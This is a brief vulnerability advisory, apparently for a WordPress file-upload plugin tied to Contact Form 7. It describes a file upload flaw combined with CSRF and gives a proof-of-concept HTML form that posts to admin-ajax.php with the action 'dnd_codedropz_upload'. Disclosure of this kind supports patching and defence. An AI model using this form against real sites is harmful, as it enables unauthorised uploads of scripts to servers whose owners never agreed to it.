The plugin was affected by a Non-Arbitrary File Upload and Cross-Site Request Forgery (CSRF) vulnerabilities. The two vulnerabilities allow us to upload files to the server, even with a script.

Proof of Concept

exploit.html file:

<form method="post" action="https://lana.solutions/vdb/contact-form-7/wp-admin/admin-ajax.php" enctype="multipart/form-data">
	<input type="hidden" name="action" value="dnd_codedropz_upload">
	<input type="file" name="upload-file">
	<input type="submit">
</form>